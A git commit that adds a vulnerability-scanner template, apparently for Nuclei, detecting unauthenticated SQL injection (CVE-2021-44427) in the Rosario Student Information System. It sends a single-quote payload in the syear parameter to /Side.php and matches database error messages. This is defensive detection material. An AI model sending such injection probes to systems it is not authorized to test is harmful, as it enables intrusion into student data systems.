Merge pull request #3224 from xShuden/master

Create CVE-2021-44427.yaml
2021-11-30 21:55:47 +04:00 · 2021-11-30 21:55:47 +04:00 · d484fed316
parent ae078ecd51 f6a952d4be
commit d484fed316
1 changed files with 38 additions and 0 deletions
--- a/cves/2021/CVE-2021-44427.yaml
+++ b/cves/2021/CVE-2021-44427.yaml
@ -0,0 +1,38 @@
+id: CVE-2021-44427
+
+info:
+  name: Rosario Student Information System Unauthenticated SQL Injection
+  author: furkansayim,xShuden
+  severity: critical
+  description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
+  reference:
+    - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
+    - https://twitter.com/RemotelyAlerts/status/1465697928178122775
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44427
+  tags: cve,cve2021,sqli,rosariosis
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/Side.php"
+    body: "sidefunc=update&syear=111'"
+    headers:
+      Content-Type: application/x-www-form-urlencoded; charset=utf-8
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB Execute Failed. ERROR:"
+          - "unterminated quoted string"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "RosarioSIS="